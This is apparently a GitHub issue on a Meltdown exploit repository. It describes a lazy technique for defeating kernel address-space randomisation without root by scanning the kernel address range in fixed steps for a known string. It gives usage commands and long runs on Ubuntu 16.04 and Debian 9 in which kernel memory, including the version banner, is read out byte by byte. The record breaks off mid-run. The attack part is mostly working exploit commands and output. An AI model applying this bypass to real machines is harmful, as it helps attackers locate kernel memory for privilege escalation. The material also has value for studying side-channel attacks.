Meltdown as KASLR bypass #67

Open
bcoles opened this issue Jan 5, 2020 · 0 comments


bcoles commented Jan 5, 2020

Can't defeat KASLR yet, so you may need to enter your password to find linux_proc_banner in the /proc/kallsyms (or do it manually).

Here's a modified version of meltdown.c using an extremely simplistic implementation (lazy hack) to find the kernel virtual address space, from which the base address can be inferred, without requiring root privileges (x86_64 only). Leaving this here in case it is useful.

Given the size of the kernel, and that the kernel is aligned, it is reasonable to expect that some symbols (such as debug or linux_proc_banner) can be found within the first ~100 bytes while iterating over the potential kernel virtual address space.

This technique iterates with a step of 0x100000, across the kernel virtual address space 0xffffffff80000000 to 0xffffffffffffffff [1], and checks the first 100 bytes for debug or linux_proc_banner.

Possibly the laziest and slowest approach possible. It is not efficient. It is not optimized. It does not implement the techniques in the paper.

Also, note that the printed offset may be off by a couple of bytes. I cared only about locating the kernel, not the exact offset.


Usage:  ./a.out <start address> <number of bytes to search>

Depending on the target kernel, a faster technique may be to modify the hard-coded step to iterate by 0x1000000 (rather than 0x100000) starting at offset 0xa00000; i.e.: ./a.out 0xffffffff80a00000 100.

Ubuntu 16.04 (4.4.0-21-generic)

test@ubuntu-16-04-x64:~/Desktop/meltdown-exploit$ time ./a.out 0xffffffff80000000 100
cached = 65, uncached = 285, threshold 136
read ffffffff80000000 = ff   (score=0/1000)
read ffffffff80000001 = ff   (score=0/1000)
read ffffffff80000002 = ff   (score=0/1000)
read ffffffff80000003 = ff   (score=0/1000)
read ffffffff80000004 = ff   (score=0/1000)
read ffffffff80000005 = ff   (score=0/1000)
read ffffffff80000006 = ff   (score=0/1000)
read ffffffff80000007 = ff   (score=0/1000)
read ffffffff80000008 = ff   (score=0/1000)
read ffffffff80000009 = ff   (score=0/1000)
read ffffffff8000000a = ff   (score=0/1000)
read ffffffff8000000b = ff   (score=0/1000)
read ffffffff8000000c = ff   (score=0/1000)
read ffffffff8000000d = ff   (score=0/1000)
read ffffffff8000000e = ff   (score=0/1000)
read ffffffff8000000f = ff   (score=0/1000)
read ffffffff80000010 = ff   (score=0/1000)
read ffffffff80000011 = ff   (score=0/1000)
read ffffffff80000012 = ff   (score=0/1000)
read ffffffff80000013 = ff   (score=0/1000)
read ffffffff80000014 = ff   (score=0/1000)
read ffffffff80000015 = ff   (score=0/1000)
read ffffffff80000016 = ff   (score=0/1000)
read ffffffff80000017 = ff   (score=0/1000)
read ffffffff80000018 = ff   (score=0/1000)
read ffffffff80000019 = ff   (score=0/1000)
read ffffffff8000001a = ff   (score=0/1000)
read ffffffff8000001b = ff   (score=0/1000)
read ffffffff8000001c = ff   (score=0/1000)
read ffffffff8000001d = ff   (score=0/1000)
read ffffffff8000001e = ff   (score=0/1000)
read ffffffff8000001f = ff   (score=0/1000)
read ffffffff80000020 = ff   (score=0/1000)
read ffffffff80000021 = ff   (score=0/1000)
read ffffffff80000022 = ff   (score=0/1000)
read ffffffff80000023 = ff   (score=0/1000)
read ffffffff80000024 = ff   (score=0/1000)
read ffffffff80000025 = ff   (score=0/1000)
read ffffffff80000026 = ff   (score=0/1000)
read ffffffff80000027 = ff   (score=0/1000)
read ffffffff80000028 = ff   (score=0/1000)
read ffffffff80000029 = ff   (score=0/1000)
read ffffffff8000002a = ff   (score=0/1000)
read ffffffff8000002b = ff   (score=0/1000)
read ffffffff8000002c = ff   (score=0/1000)
read ffffffff8000002d = ff   (score=0/1000)
read ffffffff8000002e = ff   (score=0/1000)
read ffffffff8000002f = ff   (score=0/1000)
read ffffffff80000030 = ff   (score=0/1000)
read ffffffff80000031 = ff   (score=0/1000)
read ffffffff80000032 = ff   (score=0/1000)
read ffffffff80000033 = ff   (score=0/1000)
read ffffffff80000034 = ff   (score=0/1000)
read ffffffff80000035 = ff   (score=0/1000)
read ffffffff80000036 = ff   (score=0/1000)
read ffffffff80000037 = ff   (score=0/1000)
read ffffffff80000038 = ff   (score=0/1000)
read ffffffff80000039 = ff   (score=0/1000)
read ffffffff8000003a = ff   (score=0/1000)
read ffffffff8000003b = ff   (score=0/1000)
read ffffffff8000003c = ff   (score=0/1000)
read ffffffff8000003d = ff   (score=0/1000)
read ffffffff8000003e = ff   (score=0/1000)
read ffffffff8000003f = ff   (score=0/1000)
read ffffffff80000040 = ff   (score=0/1000)
read ffffffff80000041 = ff   (score=0/1000)
read ffffffff80000042 = ff   (score=0/1000)
read ffffffff80000043 = ff   (score=0/1000)
read ffffffff80000044 = ff   (score=0/1000)
read ffffffff80000045 = ff   (score=0/1000)
read ffffffff80000046 = ff   (score=0/1000)
read ffffffff80000047 = ff   (score=0/1000)
read ffffffff80000048 = ff   (score=0/1000)
read ffffffff80000049 = ff   (score=0/1000)
read ffffffff8000004a = ff   (score=0/1000)
read ffffffff8000004b = ff   (score=0/1000)
read ffffffff8000004c = ff   (score=0/1000)
read ffffffff8000004d = ff   (score=0/1000)
read ffffffff8000004e = ff   (score=0/1000)
read ffffffff8000004f = ff   (score=0/1000)
read ffffffff80000050 = ff   (score=0/1000)
read ffffffff80000051 = ff   (score=0/1000)
read ffffffff80000052 = ff   (score=0/1000)
read ffffffff80000053 = ff   (score=0/1000)
read ffffffff80000054 = ff   (score=0/1000)
read ffffffff80000055 = ff   (score=0/1000)
read ffffffff80000056 = ff   (score=0/1000)
read ffffffff80000057 = ff   (score=0/1000)
read ffffffff80000058 = ff   (score=0/1000)
read ffffffff80000059 = ff   (score=0/1000)
read ffffffff8000005a = ff   (score=0/1000)
read ffffffff8000005b = ff   (score=0/1000)
read ffffffff8000005c = ff   (score=0/1000)
read ffffffff8000005d = ff   (score=0/1000)
read ffffffff8000005e = ff   (score=0/1000)
read ffffffff8000005f = ff   (score=0/1000)
read ffffffff80000060 = ff   (score=0/1000)
read ffffffff80000061 = ff   (score=0/1000)
read ffffffff80000062 = ff   (score=0/1000)
read ffffffff80000063 = ff   (score=0/1000)
read ffffffff80000064 = ff   (score=0/1000)
read ffffffff80000065 = ff   (score=0/1000)
read ffffffff80000066 = ff   (score=0/1000)
read ffffffff80000067 = ff   (score=0/1000)
read ffffffff80000068 = ff   (score=0/1000)
read ffffffff80000069 = ff   (score=0/1000)
read ffffffff8000006a = ff   (score=0/1000)
read ffffffff8000006b = ff   (score=0/1000)
read ffffffff8000006c = ff   (score=0/1000)
read ffffffff8000006d = ff   (score=0/1000)
read ffffffff8000006e = ff   (score=0/1000)
read ffffffff8000006f = ff   (score=0/1000)
read ffffffff80000070 = ff   (score=0/1000)
read ffffffff80000071 = ff   (score=0/1000)
read ffffffff80000072 = ff   (score=0/1000)
read ffffffff80000073 = ff   (score=0/1000)
read ffffffff80000074 = ff   (score=0/1000)
read ffffffff80000075 = ff   (score=0/1000)
read ffffffff80000076 = ff   (score=0/1000)
read ffffffff80000077 = ff   (score=0/1000)
read ffffffff80000078 = ff   (score=0/1000)
read ffffffff80000079 = ff   (score=0/1000)
read ffffffff8000007a = ff   (score=0/1000)
read ffffffff8000007b = ff   (score=0/1000)
read ffffffff8000007c = ff   (score=0/1000)
read ffffffff8000007d = ff   (score=0/1000)
read ffffffff8000007e = ff   (score=0/1000)
read ffffffff8000007f = ff   (score=0/1000)
read ffffffff80000080 = ff   (score=0/1000)
read ffffffff80000081 = ff   (score=0/1000)
read ffffffff80000082 = ff   (score=0/1000)
read ffffffff80000083 = ff   (score=0/1000)
read ffffffff80000084 = ff   (score=0/1000)
read ffffffff80000085 = ff   (score=0/1000)
read ffffffff80000086 = ff   (score=0/1000)
read ffffffff80000087 = ff   (score=0/1000)
read ffffffff80000088 = ff   (score=0/1000)
read ffffffff80000089 = ff   (score=0/1000)
read ffffffff8000008a = ff   (score=0/1000)
read ffffffff8000008b = ff   (score=0/1000)
read ffffffff8000008c = ff   (score=0/1000)
read ffffffff8000008d = ff   (score=0/1000)
read ffffffff8000008e = ff   (score=0/1000)
read ffffffff8000008f = ff   (score=0/1000)
read ffffffff80000090 = ff   (score=0/1000)
read ffffffff80000091 = ff   (score=0/1000)
read ffffffff80000092 = ff   (score=0/1000)
read ffffffff80000093 = ff   (score=0/1000)
read ffffffff80000094 = ff   (score=0/1000)
read ffffffff80000095 = ff   (score=0/1000)
read ffffffff80000096 = ff   (score=0/1000)
read ffffffff80000097 = ff   (score=0/1000)
read ffffffff80000098 = ff   (score=0/1000)
read ffffffff80000099 = ff   (score=0/1000)
read ffffffff8000009a = ff   (score=0/1000)
read ffffffff8000009b = ff   (score=0/1000)
read ffffffff8000009c = ff   (score=0/1000)
read ffffffff8000009d = ff   (score=0/1000)
read ffffffff8000009e = ff   (score=0/1000)
read ffffffff8000009f = ff   (score=0/1000)
read ffffffff800000a0 = ff   (score=0/1000)
read ffffffff800000a1 = ff   (score=0/1000)
read ffffffff800000a2 = ff   (score=0/1000)
read ffffffff800000a3 = ff   (score=0/1000)
read ffffffff800000a4 = ff   (score=0/1000)
read ffffffff800000a5 = ff   (score=0/1000)
read ffffffff800000a6 = ff   (score=0/1000)
read ffffffff800000a7 = ff   (score=0/1000)
read ffffffff800000a8 = ff   (score=0/1000)
read ffffffff800000a9 = ff   (score=0/1000)
read ffffffff800000aa = ff   (score=0/1000)
read ffffffff800000ab = ff   (score=0/1000)
read ffffffff800000ac = ff   (score=0/1000)
read ffffffff800000ad = ff   (score=0/1000)
read ffffffff800000ae = ff   (score=0/1000)
read ffffffff800000af = ff   (score=0/1000)
read ffffffff800000b0 = ff   (score=0/1000)
read ffffffff800000b1 = ff   (score=0/1000)
read ffffffff800000b2 = ff   (score=0/1000)
read ffffffff800000b3 = ff   (score=0/1000)
read ffffffff800000b4 = ff   (score=0/1000)
read ffffffff800000b5 = ff   (score=0/1000)
read ffffffff800000b6 = ff   (score=0/1000)
read ffffffff800000b7 = ff   (score=0/1000)
read ffffffff800000b8 = ff   (score=0/1000)
read ffffffff800000b9 = ff   (score=0/1000)
read ffffffff800000ba = ff   (score=0/1000)
read ffffffff800000bb = ff   (score=0/1000)
read ffffffff800000bc = ff   (score=0/1000)
read ffffffff800000bd = ff   (score=0/1000)
read ffffffff800000be = ff   (score=0/1000)
read ffffffff800000bf = ff   (score=0/1000)
read ffffffff800000c0 = ff   (score=0/1000)
read ffffffff800000c1 = ff   (score=0/1000)
read ffffffff800000c2 = ff   (score=0/1000)
read ffffffff800000c3 = ff   (score=0/1000)
read ffffffff800000c4 = ff   (score=0/1000)
read ffffffff800000c5 = ff   (score=0/1000)
read ffffffff800000c6 = ff   (score=0/1000)
read ffffffff800000c7 = ff   (score=0/1000)
read ffffffff800000c8 = ff   (score=0/1000)
read ffffffff800000c9 = ff   (score=0/1000)
read ffffffff800000ca = ff   (score=0/1000)
read ffffffff800000cb = ff   (score=0/1000)
read ffffffff800000cc = ff   (score=0/1000)
read ffffffff800000cd = ff   (score=0/1000)
read ffffffff800000ce = ff   (score=0/1000)
read ffffffff800000cf = ff   (score=0/1000)
read ffffffff800000d0 = ff   (score=0/1000)
read ffffffff800000d1 = ff   (score=0/1000)
read ffffffff800000d2 = ff   (score=0/1000)
read ffffffff800000d3 = ff   (score=0/1000)
read ffffffff800000d4 = ff   (score=0/1000)
read ffffffff800000d5 = ff   (score=0/1000)
read ffffffff800000d6 = ff   (score=0/1000)
read ffffffff800000d7 = ff   (score=0/1000)
read ffffffff800000d8 = ff   (score=0/1000)
read ffffffff800000d9 = ff   (score=0/1000)
read ffffffff800000da = ff   (score=0/1000)
read ffffffff800000db = ff   (score=0/1000)
read ffffffff800000dc = ff   (score=0/1000)
read ffffffff800000dd = ff   (score=0/1000)
read ffffffff800000de = ff   (score=0/1000)
read ffffffff800000df = ff   (score=0/1000)
read ffffffff800000e0 = ff   (score=0/1000)
read ffffffff800000e1 = ff   (score=0/1000)
read ffffffff800000e2 = ff   (score=0/1000)
read ffffffff800000e3 = ff   (score=0/1000)
read ffffffff800000e4 = ff   (score=0/1000)
read ffffffff800000e5 = ff   (score=0/1000)
read ffffffff800000e6 = ff   (score=0/1000)
read ffffffff800000e7 = ff   (score=0/1000)
read ffffffff800000e8 = ff   (score=0/1000)
read ffffffff800000e9 = ff   (score=0/1000)
read ffffffff800000ea = ff   (score=0/1000)
read ffffffff800000eb = ff   (score=0/1000)
read ffffffff800000ec = ff   (score=0/1000)
read ffffffff800000ed = ff   (score=0/1000)
read ffffffff800000ee = ff   (score=0/1000)
read ffffffff800000ef = ff   (score=0/1000)
read ffffffff800000f0 = ff   (score=0/1000)
read ffffffff800000f1 = ff   (score=0/1000)
read ffffffff800000f2 = ff   (score=0/1000)
read ffffffff800000f3 = ff   (score=0/1000)
read ffffffff800000f4 = ff   (score=0/1000)
read ffffffff800000f5 = ff   (score=0/1000)
read ffffffff800000f6 = ff   (score=0/1000)
read ffffffff800000f7 = ff   (score=0/1000)
read ffffffff800000f8 = ff   (score=0/1000)
read ffffffff800000f9 = ff   (score=0/1000)
read ffffffff800000fa = ff   (score=0/1000)
read ffffffff800000fb = ff   (score=0/1000)
read ffffffff800000fc = ff   (score=0/1000)
read ffffffff800000fd = ff   (score=0/1000)
read ffffffff800000fe = ff   (score=0/1000)
read ffffffff800000ff = ff   (score=0/1000)
Dumped: ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
NOT VULNERABLE

[...]

cached = 31, uncached = 260, threshold 89
read ffffffff81a00000 = ff   (score=0/1000)
read ffffffff81a00001 = ff   (score=0/1000)
read ffffffff81a00002 = ff   (score=0/1000)
read ffffffff81a00003 = ff   (score=0/1000)
read ffffffff81a00004 = ff   (score=0/1000)
read ffffffff81a00005 = ff   (score=0/1000)
read ffffffff81a00006 = ff   (score=0/1000)
read ffffffff81a00007 = ff   (score=0/1000)
read ffffffff81a00008 = ff   (score=0/1000)
read ffffffff81a00009 = ff   (score=0/1000)
read ffffffff81a0000a = ff   (score=0/1000)
read ffffffff81a0000b = ff   (score=0/1000)
read ffffffff81a0000c = ff   (score=0/1000)
read ffffffff81a0000d = ff   (score=0/1000)
read ffffffff81a0000e = ff   (score=0/1000)
read ffffffff81a0000f = ff   (score=0/1000)
read ffffffff81a00010 = ff   (score=0/1000)
read ffffffff81a00011 = ff   (score=0/1000)
read ffffffff81a00012 = ff   (score=0/1000)
read ffffffff81a00013 = ff   (score=0/1000)
read ffffffff81a00014 = ff   (score=0/1000)
read ffffffff81a00015 = ff   (score=0/1000)
read ffffffff81a00016 = ff   (score=0/1000)
read ffffffff81a00017 = ff   (score=0/1000)
read ffffffff81a00018 = ff   (score=0/1000)
read ffffffff81a00019 = ff   (score=0/1000)
read ffffffff81a0001a = ff   (score=0/1000)
read ffffffff81a0001b = ff   (score=0/1000)
read ffffffff81a0001c = ff   (score=0/1000)
read ffffffff81a0001d = ff   (score=0/1000)
read ffffffff81a0001e = ff   (score=0/1000)
read ffffffff81a0001f = ff   (score=0/1000)
read ffffffff81a00020 = ff   (score=0/1000)
read ffffffff81a00021 = ff   (score=0/1000)
read ffffffff81a00022 = ff   (score=0/1000)
read ffffffff81a00023 = ff   (score=0/1000)
read ffffffff81a00024 = ff   (score=0/1000)
read ffffffff81a00025 = ff   (score=0/1000)
read ffffffff81a00026 = ff   (score=0/1000)
read ffffffff81a00027 = ff   (score=0/1000)
read ffffffff81a00028 = ff   (score=0/1000)
read ffffffff81a00029 = ff   (score=0/1000)
read ffffffff81a0002a = ff   (score=0/1000)
read ffffffff81a0002b = ff   (score=0/1000)
read ffffffff81a0002c = ff   (score=0/1000)
read ffffffff81a0002d = ff   (score=0/1000)
read ffffffff81a0002e = ff   (score=0/1000)
read ffffffff81a0002f = ff   (score=0/1000)
read ffffffff81a00030 = ff   (score=0/1000)
read ffffffff81a00031 = ff   (score=0/1000)
read ffffffff81a00032 = ff   (score=0/1000)
read ffffffff81a00033 = ff   (score=0/1000)
read ffffffff81a00034 = ff   (score=0/1000)
read ffffffff81a00035 = ff   (score=0/1000)
read ffffffff81a00036 = ff   (score=0/1000)
read ffffffff81a00037 = ff   (score=0/1000)
read ffffffff81a00038 = ff   (score=0/1000)
read ffffffff81a00039 = ff   (score=0/1000)
read ffffffff81a0003a = ff   (score=0/1000)
read ffffffff81a0003b = ff   (score=0/1000)
read ffffffff81a0003c = ff   (score=0/1000)
read ffffffff81a0003d = ff   (score=0/1000)
read ffffffff81a0003e = ff   (score=0/1000)
read ffffffff81a0003f = ff   (score=0/1000)
read ffffffff81a00040 = 5f _ (score=973/1000)
read ffffffff81a00041 = 64 d (score=968/1000)
read ffffffff81a00042 = 65 e (score=977/1000)
read ffffffff81a00043 = 62 b (score=971/1000)
read ffffffff81a00044 = 75 u (score=977/1000)
read ffffffff81a00045 = 67 g (score=981/1000)
read ffffffff81a00046 = ff   (score=0/1000)
read ffffffff81a00047 = ff   (score=0/1000)
read ffffffff81a00048 = ff   (score=0/1000)
read ffffffff81a00049 = ff   (score=0/1000)
read ffffffff81a0004a = ff   (score=0/1000)
read ffffffff81a0004b = ff   (score=0/1000)
read ffffffff81a0004c = ff   (score=0/1000)
read ffffffff81a0004d = ff   (score=0/1000)
read ffffffff81a0004e = ff   (score=0/1000)
read ffffffff81a0004f = ff   (score=0/1000)
read ffffffff81a00050 = ff   (score=0/1000)
read ffffffff81a00051 = ff   (score=0/1000)
read ffffffff81a00052 = ff   (score=0/1000)
read ffffffff81a00053 = ff   (score=0/1000)
read ffffffff81a00054 = ff   (score=0/1000)
read ffffffff81a00055 = ff   (score=0/1000)
read ffffffff81a00056 = ff   (score=0/1000)
read ffffffff81a00057 = ff   (score=0/1000)
read ffffffff81a00058 = ff   (score=0/1000)
read ffffffff81a00059 = ff   (score=0/1000)
read ffffffff81a0005a = ff   (score=0/1000)
read ffffffff81a0005b = ff   (score=0/1000)
read ffffffff81a0005c = ff   (score=0/1000)
read ffffffff81a0005d = ff   (score=0/1000)
read ffffffff81a0005e = ff   (score=0/1000)
read ffffffff81a0005f = ff   (score=0/1000)
read ffffffff81a00060 = 25 % (score=980/1000)
read ffffffff81a00061 = 73 s (score=978/1000)
read ffffffff81a00062 = 20   (score=983/1000)
read ffffffff81a00063 = 76 v (score=971/1000)
read ffffffff81a00064 = 65 e (score=969/1000)
read ffffffff81a00065 = 72 r (score=980/1000)
read ffffffff81a00066 = 73 s (score=974/1000)
read ffffffff81a00067 = 69 i (score=979/1000)
read ffffffff81a00068 = 6f o (score=980/1000)
read ffffffff81a00069 = 6e n (score=972/1000)
read ffffffff81a0006a = 20   (score=978/1000)
read ffffffff81a0006b = 25 % (score=984/1000)
read ffffffff81a0006c = 73 s (score=978/1000)
read ffffffff81a0006d = 20   (score=982/1000)
read ffffffff81a0006e = 28 ( (score=980/1000)
read ffffffff81a0006f = 62 b (score=974/1000)
read ffffffff81a00070 = 75 u (score=976/1000)
read ffffffff81a00071 = 69 i (score=980/1000)
read ffffffff81a00072 = 6c l (score=975/1000)
read ffffffff81a00073 = 64 d (score=968/1000)
read ffffffff81a00074 = 64 d (score=970/1000)
read ffffffff81a00075 = 40 @ (score=983/1000)
read ffffffff81a00076 = 6c l (score=981/1000)
read ffffffff81a00077 = 67 g (score=984/1000)
read ffffffff81a00078 = 77 w (score=979/1000)
read ffffffff81a00079 = 30 0 (score=979/1000)
read ffffffff81a0007a = 31 1 (score=984/1000)
read ffffffff81a0007b = 2d - (score=980/1000)
read ffffffff81a0007c = 32 2 (score=980/1000)
read ffffffff81a0007d = 31 1 (score=934/1000)
read ffffffff81a0007e = 29 ) (score=978/1000)
read ffffffff81a0007f = 20   (score=981/1000)
read ffffffff81a00080 = 28 ( (score=989/1000)
read ffffffff81a00081 = 67 g (score=996/1000)
read ffffffff81a00082 = 63 c (score=982/1000)
read ffffffff81a00083 = 63 c (score=985/1000)
read ffffffff81a00084 = 20   (score=985/1000)
read ffffffff81a00085 = 76 v (score=990/1000)
read ffffffff81a00086 = 65 e (score=977/1000)
read ffffffff81a00087 = 72 r (score=994/1000)
read ffffffff81a00088 = 73 s (score=993/1000)
read ffffffff81a00089 = 69 i (score=989/1000)
read ffffffff81a0008a = 6f o (score=986/1000)
read ffffffff81a0008b = 6e n (score=980/1000)
read ffffffff81a0008c = 20   (score=978/1000)
read ffffffff81a0008d = 35 5 (score=981/1000)
read ffffffff81a0008e = 2e . (score=979/1000)
read ffffffff81a0008f = 33 3 (score=994/1000)
read ffffffff81a00090 = 2e . (score=982/1000)
read ffffffff81a00091 = 31 1 (score=992/1000)
read ffffffff81a00092 = 20   (score=988/1000)
read ffffffff81a00093 = 32 2 (score=990/1000)
read ffffffff81a00094 = 30 0 (score=995/1000)
read ffffffff81a00095 = 31 1 (score=985/1000)
read ffffffff81a00096 = 36 6 (score=984/1000)
read ffffffff81a00097 = 30 0 (score=994/1000)
read ffffffff81a00098 = 34 4 (score=985/1000)
read ffffffff81a00099 = 31 1 (score=986/1000)
read ffffffff81a0009a = 33 3 (score=989/1000)
read ffffffff81a0009b = 20   (score=993/1000)
read ffffffff81a0009c = 28 ( (score=993/1000)
read ffffffff81a0009d = 55 U (score=985/1000)
read ffffffff81a0009e = 62 b (score=986/1000)
read ffffffff81a0009f = 75 u (score=987/1000)
read ffffffff81a000a0 = 6e n (score=984/1000)
read ffffffff81a000a1 = 74 t (score=993/1000)
read ffffffff81a000a2 = 75 u (score=989/1000)
read ffffffff81a000a3 = 20   (score=989/1000)
read ffffffff81a000a4 = 35 5 (score=992/1000)
read ffffffff81a000a5 = 2e . (score=987/1000)
read ffffffff81a000a6 = 33 3 (score=988/1000)
read ffffffff81a000a7 = 2e . (score=978/1000)
read ffffffff81a000a8 = 31 1 (score=992/1000)
read ffffffff81a000a9 = 2d - (score=991/1000)
read ffffffff81a000aa = 31 1 (score=983/1000)
read ffffffff81a000ab = 34 4 (score=987/1000)
read ffffffff81a000ac = 75 u (score=994/1000)
read ffffffff81a000ad = 62 b (score=986/1000)
read ffffffff81a000ae = 75 u (score=994/1000)
read ffffffff81a000af = 6e n (score=978/1000)
read ffffffff81a000b0 = 74 t (score=992/1000)
read ffffffff81a000b1 = 75 u (score=988/1000)
read ffffffff81a000b2 = 32 2 (score=987/1000)
read ffffffff81a000b3 = 29 ) (score=990/1000)
read ffffffff81a000b4 = 20   (score=987/1000)
read ffffffff81a000b5 = 29 ) (score=990/1000)
read ffffffff81a000b6 = 20   (score=993/1000)
read ffffffff81a000b7 = 25 % (score=997/1000)
read ffffffff81a000b8 = 73 s (score=988/1000)
read ffffffff81a000b9 = ff   (score=0/1000)
read ffffffff81a000ba = ff   (score=0/1000)
read ffffffff81a000bb = ff   (score=0/1000)
read ffffffff81a000bc = ff   (score=0/1000)
read ffffffff81a000bd = ff   (score=0/1000)
read ffffffff81a000be = ff   (score=0/1000)
read ffffffff81a000bf = ff   (score=0/1000)
read ffffffff81a000c0 = 4c L (score=988/1000)
read ffffffff81a000c1 = 69 i (score=988/1000)
read ffffffff81a000c2 = 6e n (score=979/1000)
read ffffffff81a000c3 = 75 u (score=985/1000)
read ffffffff81a000c4 = 78 x (score=988/1000)
read ffffffff81a000c5 = 20   (score=995/1000)
read ffffffff81a000c6 = 76 v (score=988/1000)
read ffffffff81a000c7 = 65 e (score=982/1000)
read ffffffff81a000c8 = 72 r (score=996/1000)
read ffffffff81a000c9 = 73 s (score=991/1000)
read ffffffff81a000ca = 69 i (score=990/1000)
read ffffffff81a000cb = 6f o (score=985/1000)
read ffffffff81a000cc = 6e n (score=983/1000)
read ffffffff81a000cd = 20   (score=989/1000)
read ffffffff81a000ce = 34 4 (score=987/1000)
read ffffffff81a000cf = 2e . (score=982/1000)
read ffffffff81a000d0 = 34 4 (score=990/1000)
read ffffffff81a000d1 = 2e . (score=986/1000)
read ffffffff81a000d2 = 30 0 (score=991/1000)
read ffffffff81a000d3 = 2d - (score=984/1000)
read ffffffff81a000d4 = 32 2 (score=992/1000)
read ffffffff81a000d5 = 31 1 (score=986/1000)
read ffffffff81a000d6 = 2d - (score=990/1000)
read ffffffff81a000d7 = 67 g (score=997/1000)
read ffffffff81a000d8 = 65 e (score=977/1000)
read ffffffff81a000d9 = 6e n (score=986/1000)
read ffffffff81a000da = 65 e (score=985/1000)
read ffffffff81a000db = 72 r (score=993/1000)
read ffffffff81a000dc = 69 i (score=984/1000)
read ffffffff81a000dd = 63 c (score=989/1000)
read ffffffff81a000de = 20   (score=993/1000)
read ffffffff81a000df = 28 ( (score=991/1000)
read ffffffff81a000e0 = 62 b (score=987/1000)
read ffffffff81a000e1 = 75 u (score=991/1000)
read ffffffff81a000e2 = 69 i (score=990/1000)
read ffffffff81a000e3 = 6c l (score=986/1000)
read ffffffff81a000e4 = 64 d (score=986/1000)
read ffffffff81a000e5 = 64 d (score=988/1000)
read ffffffff81a000e6 = 40 @ (score=986/1000)
read ffffffff81a000e7 = 6c l (score=984/1000)
read ffffffff81a000e8 = 67 g (score=992/1000)
read ffffffff81a000e9 = 77 w (score=990/1000)
read ffffffff81a000ea = 30 0 (score=996/1000)
read ffffffff81a000eb = 31 1 (score=988/1000)
read ffffffff81a000ec = 2d - (score=992/1000)
read ffffffff81a000ed = 32 2 (score=986/1000)
read ffffffff81a000ee = 31 1 (score=989/1000)
read ffffffff81a000ef = 29 ) (score=987/1000)
read ffffffff81a000f0 = 20   (score=989/1000)
read ffffffff81a000f1 = 28 ( (score=984/1000)
read ffffffff81a000f2 = 67 g (score=994/1000)
read ffffffff81a000f3 = 63 c (score=975/1000)
read ffffffff81a000f4 = 63 c (score=986/1000)
read ffffffff81a000f5 = 20   (score=986/1000)
read ffffffff81a000f6 = 76 v (score=989/1000)
read ffffffff81a000f7 = 65 e (score=981/1000)
read ffffffff81a000f8 = 72 r (score=992/1000)
read ffffffff81a000f9 = 73 s (score=990/1000)
read ffffffff81a000fa = 69 i (score=988/1000)
read ffffffff81a000fb = 6f o (score=984/1000)
read ffffffff81a000fc = 6e n (score=983/1000)
read ffffffff81a000fd = 20   (score=982/1000)
read ffffffff81a000fe = 35 5 (score=987/1000)
read ffffffff81a000ff = 2e . (score=979/1000)
Dumped: ����������������������������������������������������������������_debug��������������������������%s version %s (buildd@lgw01-21) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) %s�������Linux version 4.4.0-21-generic (buildd@lgw01-21) (gcc version 5.
offset: 0x41 ; found __param_str_initcall_debug: ffffffff81a00041

real	3m31.602s
user	3m14.924s
sys	0m13.072s

Debian 9.0 (4.9.0-3-amd64)

user@debian-9-0-x64:~/Desktop/meltdown-exploit$ ./a.out 0xffffffffaec00000 100 
cached = 41, uncached = 265, threshold 104
read ffffffffaec00000 = ff   (score=0/1000)
read ffffffffaec00001 = ff   (score=0/1000)
read ffffffffaec00002 = ff   (score=0/1000)
read ffffffffaec00003 = ff   (score=0/1000)
read ffffffffaec00004 = ff   (score=0/1000)
read ffffffffaec00005 = ff   (score=0/1000)
read ffffffffaec00006 = ff   (score=0/1000)
read ffffffffaec00007 = ff   (score=0/1000)
read ffffffffaec00008 = ff   (score=0/1000)
read ffffffffaec00009 = ff   (score=0/1000)
read ffffffffaec0000a = ff   (score=0/1000)
read ffffffffaec0000b = ff   (score=0/1000)
read ffffffffaec0000c = ff   (score=0/1000)
read ffffffffaec0000d = ff   (score=0/1000)
read ffffffffaec0000e = ff   (score=0/1000)
read ffffffffaec0000f = ff   (score=0/1000)
read ffffffffaec00010 = ff   (score=0/1000)
read ffffffffaec00011 = ff   (score=0/1000)
read ffffffffaec00012 = ff   (score=0/1000)
read ffffffffaec00013 = ff   (score=0/1000)
read ffffffffaec00014 = ff   (score=0/1000)
read ffffffffaec00015 = ff   (score=0/1000)
read ffffffffaec00016 = ff   (score=0/1000)
read ffffffffaec00017 = ff   (score=0/1000)
read ffffffffaec00018 = ff   (score=0/1000)
read ffffffffaec00019 = ff   (score=0/1000)
read ffffffffaec0001a = ff   (score=0/1000)
read ffffffffaec0001b = ff   (score=0/1000)
read ffffffffaec0001c = ff   (score=0/1000)
read ffffffffaec0001d = ff   (score=0/1000)
read ffffffffaec0001e = ff   (score=0/1000)
read ffffffffaec0001f = ff   (score=0/1000)
read ffffffffaec00020 = ff   (score=0/1000)
read ffffffffaec00021 = ff   (score=0/1000)
read ffffffffaec00022 = ff   (score=0/1000)
read ffffffffaec00023 = ff   (score=0/1000)
read ffffffffaec00024 = ff   (score=0/1000)
read ffffffffaec00025 = ff   (score=0/1000)
read ffffffffaec00026 = ff   (score=0/1000)
read ffffffffaec00027 = ff   (score=0/1000)
read ffffffffaec00028 = ff   (score=0/1000)
read ffffffffaec00029 = ff   (score=0/1000)
read ffffffffaec0002a = ff   (score=0/1000)
read ffffffffaec0002b = ff   (score=0/1000)
read ffffffffaec0002c = ff   (score=0/1000)
read ffffffffaec0002d = ff   (score=0/1000)
read ffffffffaec0002e = ff   (score=0/1000)
read ffffffffaec0002f = ff   (score=0/1000)
read ffffffffaec00030 = ff   (score=0/1000)
read ffffffffaec00031 = ff   (score=0/1000)
read ffffffffaec00032 = ff   (score=0/1000)
read ffffffffaec00033 = ff   (score=0/1000)
read ffffffffaec00034 = ff   (score=0/1000)
read ffffffffaec00035 = ff   (score=0/1000)
read ffffffffaec00036 = ff   (score=0/1000)
read ffffffffaec00037 = ff   (score=0/1000)
read ffffffffaec00038 = ff   (score=0/1000)
read ffffffffaec00039 = ff   (score=0/1000)
read ffffffffaec0003a = ff   (score=0/1000)
read ffffffffaec0003b = ff   (score=0/1000)
read ffffffffaec0003c = ff   (score=0/1000)
read ffffffffaec0003d = ff   (score=0/1000)
read ffffffffaec0003e = ff   (score=0/1000)
read ffffffffaec0003f = ff   (score=0/1000)
read ffffffffaec00040 = 5f _ (score=991/1000)
read ffffffffaec00041 = 64 d (score=982/1000)
read ffffffffaec00042 = 65 e (score=354/1000)
read ffffffffaec00043 = 62 b (score=977/1000)
read ffffffffaec00044 = 75 u (score=259/1000)
